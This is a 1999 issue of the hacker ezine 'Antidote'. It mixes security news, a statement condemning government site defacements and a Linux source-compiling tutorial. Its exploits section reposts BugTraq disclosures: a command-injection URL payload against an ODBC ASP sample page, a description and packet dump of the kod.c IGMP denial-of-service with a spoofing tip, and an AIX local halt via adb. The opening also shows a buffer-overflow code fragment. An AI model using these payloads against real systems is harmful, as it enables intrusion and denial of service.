Volume 2 Issue 13
8/19/99

http://www.thepoison.org/antidote

    bof_ptr = (long *)buffer;
    for (i = 0; i < bufsize - 4; i += 4)
        *(bof_ptr++) = get_sp() - offs;
    printf ("Creating termcap f1le\n");
    printf ("b1tch is Fe3lyn 1t.\n");

------------------------------

In this issue of Antidote, we have over 690 subscribers and are getting more every day! The only thing that we ask of you when you read Antidote is that you go to:

www.thepoison.org/popup.html

and click on our sponsors. One issue of Antidote takes us about a week to put together and going to our sponsor only takes you about 15 seconds (if that). So please go visit our sponsor because it is the only thing we ask of you.

-)!-- Contents //--(-

0.0 - Beginning
    0.01 - What?
    0.02 - FAQ
    0.03 - Authors
    0.04 - Shouts
    0.05 - Writing
1.00 - News
    1.01 - Chinese Engineer accused of posting Secrets Online
    1.02 - More on PacketStorm
    1.03 - Mitnick Sentencing postponed Again
    1.04 - CD-PROM: Anti-warez Hardware
    1.05 - House says info not aimed at US
    1.06 - Use encryption, go to jail?
    1.07 - Hole opens Office 97 users to Hijack
2.00 - Exploits (new & older)
    2.01 - ODBC.asp.sample_page.txt
    2.02 - more.info_on.kod.c.txt
    2.03 - local.halt.aix.txt
3.00 - Misc
    3.01 - Statement by OptikLenz
    3.02 - Compiling Linux Source Code

SAY.W - SAY WHAT?
    Various quotes that might be humorous, stupid, true, or just plain making fun of something or someone.
FEAT.S - FEATURED SITES:
    http://browse.thepoison.org
    www.403-security.org
    www.hackernews.com

------------------------------

-)!-- 0.00 - Beginning //--(-

0.01 --=\\What?\\=--

What is 'Antidote'? Well, we wouldn't say that Antidote is a hacking magazine, cause that would be wrong. We don't claim to be a hacking magazine. All Antidote is, is basically current news and happenings in the underground world. We aren't going to teach you how to hack or anything, but we will supply you with the current information and exploits. Mainly Antidote is just a magazine for people to read if they have some extra time on their hands and are bored with nothing to do. If you want to read a magazine that teaches you how to hack etc, then you might want to go to your local bookstore and see if they carry '2600'.

------------------------------

0.02 --=\\FAQ\\=--

Here are the questions that we seem to receive a lot, or our "Frequently Asked Questions". Please read this before e-mailing us with questions, and if the question isn't on here or doesn't make sense, then you can e-mail us with your question.

> What exactly is "Antidote"?

See section 0.01 for a complete description.

> I find that Antidote is not aimed at the beginner and does not teach you the basics, why is that?

Antidote is for everyone. All we are, basically, is a news ezine that comes out once a week with the current news, exploits, flaws and even programming. All of the articles that are in here are received second hand (sent to us) and we very rarely edit anyone's articles.

> I just found Antidote issues on your webpage, is there any way I can get them sent to me through e-mail?

Yes, if you go to www.thepoison.org/antidote there should be a text box where you can input your e-mail address. You will receive a link to the current Antidote (where you can view it).

> If I want to submit something, are there any 'rules'?

Please see section 0.03 for a complete description.

> If I submitted something, can I remain anonymous?
Yes. Just make sure that you specify what information about yourself you would like to be published above your article (when sending it to us) and we will do what you say.

> I submitted something and I didn't see it in the current/last issue, why is that?

It could be that someone else wrote something similar to what you wrote and they sent it to us first. If you sent us something and we didn't e-mail you back, then you might want to send it again because we probably didn't get it (we respond to all e-mails no matter what). We might use your article in future issues of Antidote.

> Can I submit something that I didn't "discover" or "write"?

Yes you can, we take information that is written by anyone regardless of whether you wrote it or not.

Well, that's it for our FAQ. If you have a question that is not on here, or the question is on here and you had trouble understanding it, then please feel free to e-mail lordoak@thepoison.org and he will answer your question. This FAQ will probably be updated every month.

------------------------------

0.03 --=\\Authors\\=--

Lord Oak is the founder and current president of Antidote. Most work is done by him. Please feel free to e-mail him at: lordoak@thepoison.org

Duece is the co-founder and co-president of Antidote; some work is done by him when he comes online. Feel free to e-mail him at: duece@thepoison.org

ox1dation is not really an author, just someone that helps us out a lot, and we consider him an author! His e-mail address is: ox1dation@thepoison.org

------------------------------

0.04 --=\\Shouts\\=--

These are just some shout outs that we feel we owe to some people. Some are individuals and some are groups in general. If you are not on this list and you feel that for some reason you should be, then please contact Lord Oak and he will post you on here, and we are sorry for the misunderstanding.
Well, here are the shout outs:

    Lord Oak          EazyMoney
    Duece             opt1mus
    oX1dation         PBBSER
    Forlorn           Retribution
    0dnek             www.thepoison.org

Like we said above, if we forgot you and/or you think you should be added, please e-mail lordoak@thepoison.org and he will be sure to add you.

------------------------------

0.05 --=\\Writing\\=--

As many of you know, we are always open to articles/submissions. We will take almost anything that has to do with computer security. This leaves you open for:

    -Protecting the system (security/securing)
    -Attacking the system (hacking, exploits, flaws, etc....)
    -UNIX (really anything to do with it...)
    -News that has to do with any of the above....

The only thing that we really don't take is webpage hacks, like e-mailing us and saying "www.xxx.com" was hacked... But if you have an opinion about the hacks that is fine. If you have any questions about what is "acceptable" and not, please feel free to e-mail Lord Oak [lordoak@thepoison.org] with your question and he will answer it. Also, please note that if we receive two e-mails with the same topic/idea then we will use the one that we received first. So it might be a good idea to e-mail one of us and ask us if someone has written about/on this topic, so that way you don't waste your time on writing something that won't be published. An example of this would be:

If Joe sends me an e-mail with the topic being on hacking hotmail accounts on Thursday, and then Bill sends us an e-mail on hacking hotmail accounts on Sunday, we will take Joe's article because he sent it in first.

But keep in mind, we might use your article for the next issue! If you have something that you would like to submit to Antidote, please e-mail lordoak@thepoison.org or duece@thepoison.org and one of us will review the article and put it in Antidote (if we like it).
------------------------------

-)!-- 1.00 - News //--(-

1.01 --=\\Chinese Engineer accused of posting Secrets Online\\=--
[www.nandotimes.com]

A Chinese engineer has been arrested on charges of posting secrets about a new warplane to an Internet bulletin board, a newspaper reported Wednesday.

Authorities tracked down the engineer after the article posted in May spread to other Internet sites, the state-run China Business Times reported.

The newspaper identified the engineer only by his surname, Guo.

The article he published allegedly touched on secrets about a new fighter plane that he learned about while working at a research institute in the southwestern city of Chengdu, the newspaper said.

The newspaper alleged that Guo posted the article to show off a specialist's knowledge of military affairs.

Prosecutors in Chengdu decided a few days ago to arrest Guo on charges of leaking state secrets, the newspaper said.

http://www.nandotimes.com/technology/story/0,1643,72624-114802-815595-0,00.html

------------------------------

1.02 --=\\More on PacketStorm\\=--

hey,

i've been working very hard with numerous corporate entities to try to get the web site back up and online as soon as possible. everything is looking very good now, and i hope to have the site back up and better than ever RSN (Real Soon Now).

hopefully, the site will be run and hosted by a professional security firm (to be named at the appropriate time), and the new site will be more professionally maintained by a full staff of security experts, administrators, and web designers. with a very substantial amount of corporate funding, the new Packet Storm Security will be a completely revamped site with more features, more updates, more bandwidth, more of everything.

news and updates will be posted here as soon as i get confirmation of the new plans, and contracts are signed.
Ken Williams

------------------------------

1.03 --=\\Mitnick Sentencing postponed Again\\=--
[www.zdnet.com]

The sentencing of convicted hacker Kevin Mitnick was postponed for a second time today. The government is asking for Mitnick to be responsible for restitution on the order of $1.5 million, while the defense is asking for payments on the order of $5,000, based on his projected earnings potential during his supervised release. He will not be able to use a computer during that three-year period.

http://www.zdnet.com/zdnn/filters/bursts/0,3422,2302198,00.html

------------------------------

1.04 --=\\CD-PROM: Anti-warez Hardware\\=--
[www.expressnews.com]

Software pirates have a new technological hurdle ahead of them. Kodak has developed a way to make CD programs more secure from hackers and unlicensed users.

It's a customized CD called the CD-PROM (Compact Disc-Programmable ROM). This includes the standard write-once feature of commercial software, but the CD-PROM also includes a recordable feature that identifies a particular computer to the CD.

"There's a lot of enthusiasm for this technology," said Bruce Ha, senior research associate at the Eastman Kodak Co. of Rochester, N.Y. "It's a format that people have been talking about for the past 10 years now."

The new hybrid technology allows software manufacturers to produce low-cost CD-ROMs with the ability to add CD-R (recordable) information.

CD-PROM works like a normal CD software product, but using the software requires start-up information specific to the licensed consumer.

For instance, many software CDs require a registration code to unlock some or all of the program's features. To get the registration code, consumers can register their software online with the software manufacturer.

To thwart Internet hackers, the CD-PROM will match the registration code with the licensed software, thus keeping hackers from using an illegal copy of the software.
Similarly, a CD-PROM is designed to work on software shipped with a specific computer. The CD-PROM can be set up to read only the BIOS information on the computer with which it was shipped. The BIOS (basic input/output system) loads and executes the computer's operating system, such as Windows 98.

"So (Microsoft) Office or any other program that comes bundled with that computer cannot be shared by anyone else," Ha said.

But making a CD-PROM has been difficult.

A normal CD contains data embedded into "pits" that are pressed into the platter. The platter is then covered by an aluminum reflective layer and a protective plastic coating.

On a CD-R, a single groove is pressed into the platter instead of pits. An organic dye is added for recording new information onto the platter. A reflective layer of gold or silver covers the dye, and then the CD gets a protective coating.

Some manufacturers have tried to add both pits and grooves onto a CD. But they have had problems with the disc being read properly. This can occur when the ROM reader switches to the recordable writer, or because the speed of the laser light reading the CD changes when it goes through different materials on the platter.

To get around this, Kodak decided to use a single, continuous groove pressed into the platter. The master disc is designed to make the CD reader think that the groove actually contains a series of pits.

Kodak is using the CD-PROM for its Picture CD product. Ha says no failures have been noticed after beta testing 20,000 discs in photo labs.

http://www.expressnews.com/pantheon/news-bus/sheron-tech/2504rkodak_7-25nz.shtml

------------------------------

1.05 --=\\House says info not aimed at US\\=--
[www.washtimes.com]

White House spokesman David Leavy on Thursday adamantly denied a new International Public Information (IPI) system would be directed at American audiences.
IPI is a secret Clinton administration program to control public information disseminated by the departments of State and Defense and intelligence agencies.

It is meant to "influence foreign audiences in a way favorable to the achievement of U.S. foreign-policy objectives," according to a draft IPI charter obtained by The Washington Times.

"That is totally inaccurate," Mr. Leavy said. "The IPI initiative is designed to better organize the government and the instruments we have to support our public diplomacy, military activities and economic engagement overseas. There is no impact on the domestic press."

Mr. Leavy said that U.S. information officials at home and abroad serve different functions.

"There are officers who work with the media in the United States and officers who support the U.S. policy overseas. They are totally separate. They are totally different functions," Mr. Leavy said.

But a former deputy chief of the U.S. Information Agency (USIA) under three presidents said he fears the IPI plan would mean U.S. propaganda aimed at foreigners would be used to influence American elections.

Gene Kopp, who served under Presidents Nixon, Ford and Bush, said the elections of President Kennedy and President Carter were directly influenced by leaks of USIA foreign public-opinion polls showing a decline in U.S. prestige abroad.

"I am concerned this could happen again under the IPI plan," said Mr. Kopp, currently a Washington lawyer. "The administration is transferring all assets, except broadcasting, to State, where they will not be separated in any way. It will be very difficult to separate what is disseminated in the United States and overseas."

He said that the opportunity for abusing the system will be great.

"The temptation to spin this stuff in a partisan way will be very strong -- probably irresistible," he said. "The other ominous feature is that this includes the intelligence agencies. They are in the business of misinformation.
God only knows where that goes."

New allegations emerged Thursday that the Clinton administration has been trying to control how American news organizations cover foreign affairs, at least since the Bosnia peacekeeping mission in 1996.

According to a former government official, who insisted on anonymity, the White House created a Strategic Planning Directorate, which used the State Department and USIA to pressure American reporters into favorable coverage of the U.S. troop deployment in Bosnia-Herzegovina. It came into being just prior to the 1996 presidential election.

"I heard them talk about it in conference telephone calls -- how they had to control the media out there, the bureau chiefs, because if the Republicans picked this up [the Clinton administration] would be exposed as having no foreign policy," said the former government official.

Shortly after President Clinton won re-election in 1996, the administration announced that U.S. troops would not be home by Christmas, as promised. Today, nearly three years later, some 7,000 U.S. troops remain in Bosnia.

"The U.S. public wanted to know how long American troops had to be there," said the ex-official. "The Clinton people said 'only one year,' and [that] they would be home in December, after the election. But everyone knew the only way to keep the warring sides apart was robust international and American presence."

This former official said this was widely discussed.

"In the conference calls, they openly discussed how they had to prevent American journalists from discussing this," he said.

The source said that USIA officials and National Security Adviser Samuel R. Berger tried to convince American editors not to publish accounts by their reporters who wrote that Bosnia was unsafe for Americans, that Muslim extremists were a threat, and that the warring sides would never be pacified.

Ivo Daalder, who was a staffer on the National Security Council at the time, said discussions had no ulterior motives.

Mr.
Daalder, who is now at the Brookings Institution, said the talks among the USIA, National Security Council and other agencies "had the sole purpose of making sure they share information among them, and when the U.S. government speaks to the outside world, it does so in a coordinated manner."

Mr. Daalder said "there was no deliberate campaign designed to put out false information prior to the 1996 presidential election."

He said that USIA did increase staffing and efforts to convince American reporters in Bosnia of the administration's perspective in September, prior to the Bosnian elections.

http://www.washtimes.com/news/news3.html

------------------------------

1.06 --=\\Use encryption, go to jail?\\=--
[www.cnn.com]

Encryption users could face up to two years in prison for refusing to hand over the keys to their code, according to Britain's proposed Electronic Communications Bill.

The bill is causing concern among privacy advocates and opposition parties, who say the bill gives law enforcement wide-reaching power over private Internet communications.

Most aggravating, the bill calls for a possible two years in prison for anyone refusing to turn over the encryption key or the message in plain text to law-enforcement officials. It also calls for a five-year prison term for tipping off senders that they are being investigated, according to Caspar Bowden, director of the London-based Foundation for Information Policy Research.

Even discussing an investigation in public, such as complaining about alleged abuses of law enforcement to the media, may also be punishable by imprisonment, said Bowden.

"Let's say that someone under investigation sends me a message with encryption that can only be decrypted by the receiver. The authorities come to me and tell me that they are investigating someone, but won't tell me who, so they ask for all my private keys," Bowden said. Refusing this request from the authorities could get him two years in prison, said Bowden.
In such a case, the authorities would have all of Bowden's private keys, enabling law enforcement to read all encrypted correspondence that was sent to him. Bowden would then have no choice, he said, because by informing anyone of this, and asking them to change their key, he would break the "tipping off" clause of the bill and in turn face five years' imprisonment.

"I can't complain to the newspaper, otherwise it's five years in jail. All I can do is go to a secret tribunal," Bowden said. He's not joking: The tribunal is five judges, only two have to participate, and only one has to lay the groundwork, he added.

Bowden feels that the entire bill needs to be re-examined by the U.K.'s Department of Trade and Industry. "We would like to see the Electronic Communication Bill be about e-commerce, which is what they said; the law-enforcement section doesn't even belong in it," he added.

There is also another method of hiding messages, called steganography. It's not really clear to commentators such as Bowden whether or not steganography is covered by the bill.

With steganography, users can "sprinkle an encrypted message" into a photographic format, such as JPEG, or a music format such as MP3, both of which are very popular online. In actuality, the message does not necessarily need to be encrypted, just concealed within the file, according to Bowden.

Although the bill does not mention technologies such as steganography, Bowden speculated that the authorities could enforce regulations in those cases by proving that there was a reason to search, such as the existence of a steganography program on the suspect's computer.

http://www.cnn.com/TECH/computing/9907/29/ukencrypt.idg/index.html

------------------------------

1.07 --=\\Hole opens Office 97 users to Hijack\\=--
[www.msnbc.com]

THE VULNERABILITY IS CONTAINED in the Jet 3.51 driver (ODBCJT32.DLL) that was shipped with the popular Office 97 software suite. (Microsoft is a partner in MSNBC.) Juan Carlos G.
Cuartango, a Spanish Web developer who has discovered other important security holes, reported the problem to the NTBugTraq mailing list Thursday afternoon. Later Thursday, the Microsoft Security Team confirmed the bug in a posting to the same list.

“If you open a malicious Excel worksheet implementing this vulnerability it will send shell commands to your operating system (Windows NT, 95 and 98 are all affected) that can: (infect) you (with) a virus, delete your disks, read your files,” Cuartango said in his posting to the list. “…(T)he worksheet will get full control over your machine.”

The Microsoft posting said the company is preparing to release a security bulletin dealing with the vulnerability. Shortly before 5 a.m. ET Friday, the bulletin had not appeared on the Microsoft Office Update site or the Microsoft security site.

“We’ve verified that this vulnerability in Jet 3.51 does exist, and urge all customers who are using Jet 3.51 to upgrade to Jet 4.0,” the Microsoft mail to NtBugTraq said. “This vulnerability should be taken seriously. Office 97 users in particular should consider immediately upgrading their database driver to Jet 4.0, as Jet 3.51 is installed by default in Office 97. Office 2000 users do not need to upgrade, as Office 2000 installs Jet 4.0 by default.”

An Excel worksheet that contains code to take advantage of the vulnerability could be hidden in a frame on a Web page or sent in an e-mail. As long as the worksheet contained no macros, there would be no indication to the user who visited the Web page or opened the e-mail that any code had been executed, Cuartango reported. If the file is sent in e-mail, the recipient must be on-line to be affected, Cuartango said. He recommended not opening documents you are not expecting to receive and going off-line before opening e-mail.

If the worksheet were instead sent as an attachment to e-mail, the recipient could avoid ill effects by not opening the attachment.
To determine whether you are at risk, search your hard drive for a file named ODBCJT32.DLL. When you locate it, right-click on it and hit Properties... If the version number starts with 3.51, you should upgrade the driver as soon as possible.

Microsoft said it would provide detailed instructions for avoiding the problem in its security bulletin. In the meantime, users at risk can avoid the problem by installing Microsoft Data Access Components version 2.1, which contains Jet 4.0. MDAC 2.1 is available at www.microsoft.com/data/.

Cuartango said he reported the vulnerability “a few days ago.” He alleged in his posting that Microsoft was preparing to warn users only because he was taking the issue public. Microsoft denied the allegation.

http://www.msnbc.com/news/295385.asp#BODY

------------------------------

-)!-- 2.00 - Exploits //--(-

2.01 --=\\ODBC.asp.sample_page.txt\\=--

To: BugTraq
Subject: Yet Another ODBC Bugged ASP Sample Page
Author: Wanderley J. Abreu Junior

Dear Team,

Exploiting ODBC features that come with your sample programs is not a mystery for any of us. So let me add one more ASP sample with similar troubles:

http://server/ASPSamp/AdvWorks/equipment/catalog_type.asp

or yet

http://server/AdvWorks/equipment/catalog_type.asp

It lets you execute shell commands like the other scripts. It is an Active Server Page, so it runs the query as a local user and doesn't need any type of Remote Data Service to access the DSN. It just requires the default DSN (advworks) set.

The exploit command line can be, for instance:

http://server/AdvWorks/equipment/catalog_type.asp?ProductType=|shell("cmd+/c +dir+c:\")|

Sorry if this SERIOUS security failure was already reported.

Wanderley Junior

------------------------------

2.02 --=\\more.info_on.kod.c.txt\\=--

To: BugTraq
Subject: more detail and summary of kod.c (igmp bug for windows)
Author: klepto

Ok, Here we go again..
For those who are having trouble with kod, a lot of you are using a very old version which was the first i submitted. inserted is the latest version which should work. I wrote kod.c aka cherrycoke.c about 3-4 months ago.

It sends a fragmented igmp packet to a windows client that states that it is not fragmented but there are more frags to come; windows assembles the packets and dies trying.

Here is a dump of the packet if you want to rewrite it.

/* output via tcpdump or windump95
63.66.66.44 > 24.128.158.18: igmp-2 [v0][|igmp] (frag 52242:1480@0+) (ttl 128)
63.66.66.44 > 24.128.158.18: (frag 52242:1480@1480+) (ttl 128)
63.66.66.44 > 24.128.158.18: (frag 52242:1480@2960+) (ttl 128)
63.66.66.44 > 24.128.158.18: (frag 52242:1480@4440+) (ttl 128)
63.66.66.44 > 24.128.158.18: (frag 52242:1480@5920+) (ttl 128)
63.66.66.44 > 24.128.158.18: (frag 52242:1480@7400+) (ttl 128)
63.66.66.44 > 24.128.158.18: (frag 52242:1480@8880+) (ttl 128)
63.66.66.44 > 24.128.158.18: (frag 52242:1480@10360+) (ttl 128)
63.66.66.44 > 24.128.158.18: (frag 52242:1480@11840+) (ttl 128)
63.66.66.44 > 24.128.158.18: (frag 52242:1480@13320+) (ttl 128)
63.66.66.44 > 24.128.158.18: (frag 52242:1480@14800+) (ttl 128)
63.66.66.44 > 24.128.158.18: (frag 52242:120@16280) (ttl 128)
*/

::notice the last frag it changed length..

I have also ported kod to windows and please email me if you want a copy of it. As far as I can tell due to my exhaustive research on the subject it works on 95/98/98se/2k(some betas)

Friends of mine such as defile/nyt/ignitor/etc have rewritten kod to suit their needs..

I have tested kod.c out a lot on many machines and it works 85% of the time for me. There are circumstances to why kod doesn't always work, some routers may drop igmp packets if the source isn't local so try spoofing =). As far as I can see netcom and a lot of .ca servers drop the kod packets. So please don't bark at me =) I just found the bug, wrote the code and what you do with it is your concern =).
Patch: (no hotfix currently)
If you want to protect yourself from kod.c I suggest you get winroute from www.winroute.com get version 4.. It automatically drops igmp packets incoming and outgoing ha =) It is also a very good portmapper/NAT firewall/ip masqer as well..

Shoutouts:
amputee/ignitor/nizda/antibyte/codelogic/ill`/chord/cheesebal/traveler/winx/naz/dist/mrcide/etc... (gotta give shoutouts)

klepto@Efnet
klepto@levitate.net

------------------------------

2.03 --=\\local.halt.aix.txt\\=--

Local users can halt the operating system by the 'adb' command under my AIX box. Here's a simple C program:

    /* a.c: empty loop used as the target for adb single-stepping */
    int main(void)
    {
        int i;
        for ( i = 0; i < 10; i++ )
        {
        }
        return 0;
    }

I compiled the program and ran 'adb':

    $ cc -g -o a.out a.c
    $ adb a.out -
    adb
    .main,5:s
    a.out: running

Now host halted.

AIX 4.2 (IBM RS/6000 F50) and AIX 4.3.1 (IBM RS/6000 S70) have the 'adb' problem. But AIX 4.3.2 doesn't have the 'adb' problem. I have tested it under my AIX box.

Is it a bug of AIX 4.2, 4.3.1?

GZ Apple
gzapple@21cn.com

------------------------------

-)!-- 3.00 - Misc //--(-

3.01 --=\\Statement by OptikLenz\\=--

Something needs to be said...

First off...

Earlier this year an assembly of organizations decided to release a joint statement "condemning" Legions. This evidently was before any of them contacted Legions requesting information on what the true plight was. Because of some iniquitous media coverage a few people misunderstood our motives. This of course is in regards to the past "China Human Rights incident".

We wanted to bring a tragic predicament to surface so other people could speak out as well. The media was misinformed when they reported about our goals to aid these countries in their fight for freedom of speech. They (the media) stated we (Legions) wanted to damage certain computer networks in other parts of the world.
We wanted to help them with the situation concerning their lack of freedom, and human rights; why would we want to destroy or damage their networks, the same networks that give them what little freedom they have to communicate as people? That just makes no sense at all. I ask that the people who joined to make the statement condemning Legions take that into consideration and next time contact us so that we could discuss things, and clear up misunderstandings. It's not a funny matter when people's lives, and reputations are at stake.

As hackers the computer has built our lives, and in turn we have built our lives around the computer; we would never choose to harm such a valuable resource. The term hacker doesn't discriminate. You can be a federal agent, but the best damn coder in the world, and in the sense of the word you'll be a hacker. Bill Gates, a hacker turned billionaire. Software designers, security specialists, the people who help protect your networks: these people are hackers. "Information, and data is to be cherished, (for it can only build you not hurt you) cultivated and developed not to be annulled or locked up. Hacking is an expansive applied knowledge in any technical field. Destruction, and the unschooled acts of those who live without morals are what separates the "hackers" (those whose main purpose of life is to learn, expand, and apply what they learn) from those that go as far as turning the computer on." (-The previous quoted statement was excerpted from Keen Veracity 3 www.underzine.com).

Something serious is going on at the moment. A string of "attacks" against our own government. And till now no one has said anything. The actions of these groups are sincerely half-witted, and absurd, for it will at the end accomplish nothing except a few more long term jail sentences. The current actions of these self-proclaimed "hackers" have me infuriated.
The people DOS'ing government sites, and defacing mil, and gov domains, and damaging information: these people aren't hackers, they are nothing more than unschooled adolescent teens with nothing better on their hands. They are an endangerment to the true aspect of computer science dealt with by the hacker community. Call what they are doing what you want, but don't call it "hacking" because it's not.

So many articles have surfaced which referred to what these cracker cults are doing as "hacking", ex; "Hackers attack government" - "Hackers strike again" (false). Call them destructive, call them by their first name, but for the sake of god don't just yank out the term "hackers" for a better story; for the sake of god don't defile the name "hacker" for your personal gain.

A hacker lives by a strong code of ethics. We wouldn't be issuing this statement if we didn't. A government investigation is currently pending on the above matters. If we don't do something about this now the government will surely hold us accountable, and I'm not talking jail time. We have a lot to lose if we don't stop these people from making us look bad. Though we are not affiliated with them directly, certain mainstream media has left a misleading trail. Some of our rights as computer partisans may be at stake here.

With that said I ask that all sites that archive these senseless hacks suspend documenting these fatuous acts for the time being. The script kiddies that go out and target government and military servers are media crazy, and you are only adding fuel to their fire by flashing their work to the public.

A note to the lamers

This is where it ENDS...

In the end it's what you choose to do that makes you who you are. So make sure what you choose to do doesn't make you look like an ass.
www.hackernews.com/archive/1999/noaa/index.html
www.hackernews.com/archive/1999/army/index.html
www.hackernews.com/archive/1999/monmouth/index.html
www.hackernews.com/archive/1999/argonne/index.html
www.hackernews.com/archive/1999/nswcl/index.html
www.hackernews.com/archive/1999/senate2/index.html
www.hackernews.com/archive/1999/bnl/index.html
www.hackernews.com/archive/1999/doi/index.html

The above is an archive of recent government, and military site defacements done by what seems to be comparable to the works of 5 year olds... Look at the archived sites, and tell me something doesn't need to be done. Just letting people know we aren't going for their childish actions. We don't advocate any of the trash being done by these uninspired idiots.

we're "hackers" the other white meat!

------------------------------

3.02 --=\\Compiling Linux Source Code\\=--

OK. You're sick of RPMs and those damn big packages. You want to have more access to what goes on when you install a program. Hell, that's why you installed Linux in the first place - to have more control over the operating system. You want to be able to compile source code.

Why? There are quite a few benefits to manually compiling source code. One is that a program generally runs a lot faster when you compile it yourself. Packages (when I say packages I mean any pre-packaged program - such as Debian's .deb package or RedHat's .rpm package) are usually compiled for the minimum Linux will run on - a 386. That's not exactly taking advantage of your processor. I recompiled the kernel for RedHat 5.2 and it ran nearly twice as fast. (Kernel recompilation is another HOWTO article I'll be submitting soon.)

Another advantage of compiling yourself is that you can pick where most program files go; with pre-packaged software it goes where it chooses, which is not always the best option for a lot of people, especially those on networked computers that have some form of sysadmin watching over them.
One day an admin is scanning the /bin directory for SUID root execs and all of a sudden he sees your rpm copy of KDE sitting there.

Yet another advantage of compiling yourself is disk space. If your /usr partition is filling up, for instance, and you'd like to add another partition to conserve space (mounted on /usr/home, for example) you could simply set up the program's base directory in /usr/home. This would not be an easy task if you were trying to install an rpm. Source code is also usually smaller; it would take a hell of a lot less time to compile something rather than waiting for a big ass binary to download. This is why Netscape is so damn big: they distribute it precompiled just like most Windows apps. Also, for most anything for Linux that's remotely hacking related you only get source code. These are the advantages to compiling software yourself.

Getting and Decompressing the file

Most source code comes compressed - the extension for this is .tar.gz. This means the file was tarred - that means it packed the entire source and data files into one big file - and then it was compressed using gzip. There is another, more efficient method of compression: the bzip2 compression method. These files usually end in .tar.bz2. They are usually smaller and take less time to download; try and make bz2 files your first choice and tar.gz your second. Some source files (usually exploits) aren't compressed at all and simply end in .c or .cpp, which means they are plain source. I'll explain more about compiling plain source later.

To decompress tar.gz files, use the command 'tar -zxf bob-2.3.tar.gz' (where bob-2.3 is your example file). Tar has the gnu unzipper 'built in' - that is, it will completely decompress the file with one command. Bzip2 files require 2 separate commands: 'bunzip2 bob-2.3.tar.bz2' (which 'bunzips' the file) and then you untar it: 'tar -xf bob-2.3.tar'

Usually the best place to decompress files is in the /usr/local directory.
Unlike Windows, Unix has a very well defined directory tree and /usr/local/ is the general 'put new shit here' directory. There are others, also, such as just /usr or /home, but this is the one I generally use. If you're only temporarily creating a directory just to compile and are then deleting this directory, you can pretty much ignore this. But bear in mind some larger programs can't have their compilation directory deleted. Check the docs included for details.

Once you have decompressed the file, usually there is a directory created which is similar to the filename. In this case, let's say a directory called bob was created in /usr/local. Change directory into your newly created 'bob' directory (I hope to god you know how to do this) and take a look around. The first file that should catch your attention is something similar to INSTALL or README. Take a look at this file, because there might be some environment variables you need to set up or a library needed before the program will run right. By the way.. do this at the console or in an xterm... you can't point and click your way through this.

Usually there are 3 basic commands to compiling unix source code:

    ./configure     which is a shell script that is run to configure the Makefile etc. for your system,
    make            which actually does the compiling,
    make install    which copies the newly created binaries and libraries to various places on your system.

Run each of these one at a time, because if you run a command like:

    ./configure ; make ; make install

to do it all at once and you get a screenful of error messages, you won't know on which step the error occurred.

With most programs, after the source has successfully compiled, you can change to a higher directory and delete the temporarily created one (bob in this case). Take note though: some programs don't adhere to this rule (KDE is a good example) because they need certain data files and directories to run right.
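The unpack-and-build procedure described above, as an added example that is not part of the original article: it lists the archive before extracting it and runs the three build steps separately, each with its own log, so the failing step is named. Checking member paths goes slightly beyond the text; bob-2.3, the paths and the function names are placeholders, and an autoconf-style configure script that accepts --prefix is assumed.

```shell
#!/bin/sh
# Added example, not from the article. bob-2.3 and the paths are placeholders.
# Use: unpack bob-2.3.tar.gz "$HOME/src" && build "$HOME/src/bob-2.3" "$HOME/opt/bob"

# Read archive member names on stdin and print the ones that are absolute
# or contain a ".." component; those would land outside the build directory.
unsafe_members() {
    grep -E '^/|(^|/)\.\.(/|$)' || true
}

# List a .tar.gz before extracting it into $2; refuse if any member is unsafe.
unpack() {
    archive=$1 dest=$2
    bad=$(tar -tzf "$archive" | unsafe_members)
    if [ -n "$bad" ]; then
        echo "refusing to extract $archive, unsafe members:" >&2
        echo "$bad" >&2
        return 1
    fi
    mkdir -p "$dest" && tar -xzf "$archive" -C "$dest"
}

# Run one build step with its own log; record its name if it fails.
run_step() {
    name=$1; shift
    if "$@" >"$name.log" 2>&1; then
        echo "ok: $name"
    else
        FAILED_STEP=$name
        echo "FAILED at '$name', see $PWD/$name.log" >&2
        return 1
    fi
}

# configure, make, make install as three separate steps inside $1, installing
# under prefix $2. Stops at the first failure; FAILED_STEP says which one.
# Assumes an autoconf-style configure script (run via sh) that accepts --prefix.
build() {
    srcdir=$1 prefix=$2 FAILED_STEP= old=$PWD
    cd "$srcdir" || return 1
    run_step configure sh ./configure --prefix="$prefix" &&
        run_step make make &&
        run_step install make install
    rc=$?
    cd "$old" || return 1
    return $rc
}
```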
If You Get Errors

This is the part where you really have to evaluate what's going on - you have to use some (gasp) common sense. If you run ./configure and it complains about lib.qt.so being missing, you probably are missing the Qt libraries. Remember, if you are compiling a program you have to have not only the libraries it depends on installed; if you're on a package-based system you must also have their devel libraries. In this case, even if you had the qt rpm installed you'd still need the qt-devel rpm installed.

If you run ./configure and it complains about a variable not being set, check the INSTALL or README file and see if it says anything about variables needing to be set to where the program is. Remember, don't just set the variable and try to recompile... you have to put a reference to it in the script that's executed when you log in. Otherwise the variable will be lost when you log out. For example, if you're trying to compile KDE and it complains about the $KDEDIR variable not being set, you would edit your ~/.bash_profile (if you use the bash shell) and add 'KDEDIR=/usr/local/kde' (w/o the quotes, and with no spaces around the = sign) and also add the line 'export KDEDIR' at the bottom of the script. If you use tcsh, you need to edit your ~/.tcshrc and add /setenv KDEDIR '/usr/local/kde'/ (w/o the slashes) but you don't have to add an export line at the bottom.

Use some common sense, and if it still doesn't compile try and go to the program's web page and take a look at the FAQ or Docs section.

Compiling Scripts

Files you download that are just simple C or C++ source will have the extension .c, .cpp or .c++ and will usually be just one or two files. They usually have instructions and specific compiler options written in them... take notice of this. Open up the file in your favorite editor and check.
If they don't, you should be able to compile them by typing:

    gcc filename.c -o filename

If it's a c++ file, you might have to try something a little different, like

    c++ filename.cpp -o filename

or for C source

    cc filename.c -o filename

The -o means 'output the binary to this file' - this is what you want the binary to be named. Then you should be able to execute it by typing

    ./filename

Some files are shell scripts... they have extensions like .sh or .bash. These you should be able to execute simply by typing 'bash file' or just execute it (./file). This is not source code... it's just a script.

Well that's about it for this article... remember to RTFM and use your head... don't keep emailing the coder of the program asking for help... this is very annoying and he has other things to do.

Keep a look out for the next file I'm writing... recompiling the linux kernel for security and speed.

Keep it real... and don't be lame.

Floyd Pinkerton
July '99

------------------------------

Quote #1-

"Good for girl to meet boy in park, better for boy to park meat in girl."

------------------------------

Antidote is an HNN Affiliate
http://www.hackernews.com

All ASCII art in this issue is done by Lord Oak [lordoak@thepoison.prg] and permission is needed before using.